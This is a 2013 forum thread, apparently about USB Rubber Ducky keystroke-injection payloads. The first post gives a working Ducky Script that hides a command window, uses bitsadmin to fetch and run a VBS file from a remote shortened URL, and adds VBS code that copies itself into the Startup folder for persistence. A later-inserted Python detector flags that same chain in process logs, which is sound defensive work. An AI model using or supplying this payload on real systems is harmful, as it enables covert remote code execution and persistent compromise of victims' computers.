ethicus Posted April 24, 2013 Share Posted April 24, 2013 (edited)

I have tested this on Windows 7, but nothing else. Still need to test what happens if you run this from a crazy locked-down account, but so far it seems to work fine without ever prompting for UAC or complaining about permission issues.

REM This payload will download a given file, save it to the user's home directory, and execute it. Works great for VBS files.
REM Make sure the file terminates quickly, as the window will stay open until it does. But the window will be blank and minimized.
DELAY 10000
GUI r
DELAY 200
REM Move the run dialog out of the way
ALT SPACE
DELAY 20
STRING M
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DELAY 10
ENTER
REM Start the download and execution
STRING cmd /c start /min cmd /c "cmd /T:01 /Q /c bitsadmin /rawreturn /transfer a http://bit.ly/42z1aRg %userprofile%/pl.vbs & %userprofile%/pl.vbs"
ENTER

Sample code for the VBS file to ensure it terminates quickly, deletes the original, and also enables auto run on machine startup:

' Find the logged in user's startup folder
set WshShell = WScript.CreateObject("WScript.Shell")
strStartup = WshShell.SpecialFolders("StartMenu")
' See if we are running from the copy in the startup folder
if (WScript.ScriptName <> "helper.vbs") Then
    ' We are not, so copy this file into the startup folder
    dim filesys: set filesys = CreateObject("Scripting.FileSystemObject")
    filesys.CopyFile WScript.ScriptFullName, strStartup + "\programs\startup\helper.vbs"
    ' Delete the original
    filesys.DeleteFile(WScript.ScriptFullName)
    ' Now execute the copy in the startup folder (asynchronously, so we don't hang waiting for it to finish)
    WshShell.Run("""C:\Windows\System32\wscript.exe"" """ + strStartup + "\programs\startup\helper.vbs""")
    ' We have a copy running from a different process now, so we can quit this one
    WScript.Quit
End If
' Do the rest of your vbs payload here.

So when this runs, the ducky script will open a run prompt. Enter 115 characters. A blank CMD window will open and minimize, then sit there for a second. While it's open, in the background it's downloading the vbs file from a remote server, copying it to the user's directory, and executing it. The vbs script will copy itself to the user's startup directory, execute the copy, and terminate itself. At that time, the CMD window (still blank and minimized) will close. You now have a VBS script that will run on startup, and can run for as long as you need as a background process.

Edited April 24, 2013 by ethicus
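As an added defender-side example (written for this thread, not code from the post): a small Python scanner over constructed process-creation log lines that flags the three observable pieces of the chain above, a bitsadmin /transfer from an HTTP URL, a script host launched from the Startup folder, and the nested minimized cmd. The pipe-separated log format, the rule names and the sample lines are assumptions made for the example.

```python
"""Flag process-creation records matching the bitsadmin download-and-run chain and
the Startup-folder VBS persistence described in the post above.  The record format
('Image|ParentImage|CommandLine') and the sample lines are constructed for this
example, not real telemetry."""
import re

# Constructed sample telemetry (example.invalid is a placeholder host).
SAMPLE_LOG = """\
C:\\Windows\\System32\\cmd.exe|C:\\Windows\\explorer.exe|cmd /c start /min cmd /c "cmd /T:01 /Q /c bitsadmin /rawreturn /transfer a http://example.invalid/pl.vbs C:\\Users\\bob/pl.vbs & C:\\Users\\bob/pl.vbs"
C:\\Windows\\System32\\bitsadmin.exe|C:\\Windows\\System32\\cmd.exe|bitsadmin /rawreturn /transfer a http://example.invalid/pl.vbs C:\\Users\\bob/pl.vbs
C:\\Windows\\System32\\wscript.exe|C:\\Windows\\System32\\cmd.exe|"C:\\Windows\\System32\\wscript.exe" "C:\\Users\\bob\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\helper.vbs"
C:\\Windows\\System32\\bitsadmin.exe|C:\\Windows\\System32\\cmd.exe|bitsadmin /list
C:\\Windows\\System32\\wscript.exe|C:\\Windows\\explorer.exe|wscript.exe C:\\Tools\\inventory.vbs
"""

# bitsadmin used as a downloader: /transfer with a remote http(s) source.
BITS_REMOTE = re.compile(r"bitsadmin(\.exe)?\b.*?/transfer\b.*?\bhttps?://", re.I)
# A script host executing a script that lives in a Startup folder.
STARTUP_SCRIPT = re.compile(r'(wscript|cscript)(\.exe)?.*\\Startup\\[^"]+\.(vbs|vbe|wsf|js)', re.I)
# The nested "start /min cmd" used to keep the window out of sight.
HIDDEN_CHAIN = re.compile(r"cmd(\.exe)?\s+/c\s+start\s+/min\s+cmd", re.I)

def classify(command_line):
    """Return the list of rule names a single command line triggers."""
    hits = []
    if BITS_REMOTE.search(command_line):
        hits.append("bitsadmin_remote_transfer")
    if STARTUP_SCRIPT.search(command_line):
        hits.append("startup_folder_script")
    if HIDDEN_CHAIN.search(command_line):
        hits.append("minimized_cmd_chain")
    return hits

def scan(log_text):
    """Parse the records; return (image basename, rules) for each record that hits."""
    findings = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        image, _parent, cmdline = line.split("|", 2)
        rules = classify(cmdline)
        if rules:
            findings.append((image.rsplit("\\", 1)[-1].lower(), rules))
    return findings

if __name__ == "__main__":
    for image, rules in scan(SAMPLE_LOG):
        print(f"{image}: {', '.join(rules)}")
```

The benign `bitsadmin /list` and the script run from outside a Startup folder produce no hits, which is the false-positive boundary these rules are meant to keep.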
ethicus Posted April 24, 2013 Author Share Posted April 24, 2013

bitsadmin is not natively supported in XP :( So it appears to only work in Windows 7.
overwraith Posted April 24, 2013 Share Posted April 24, 2013

Encoder version 2.4 has the repeat command. You've probably already seen it, but here is the link to the hide command window payloads. https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payload---hide-cmd-window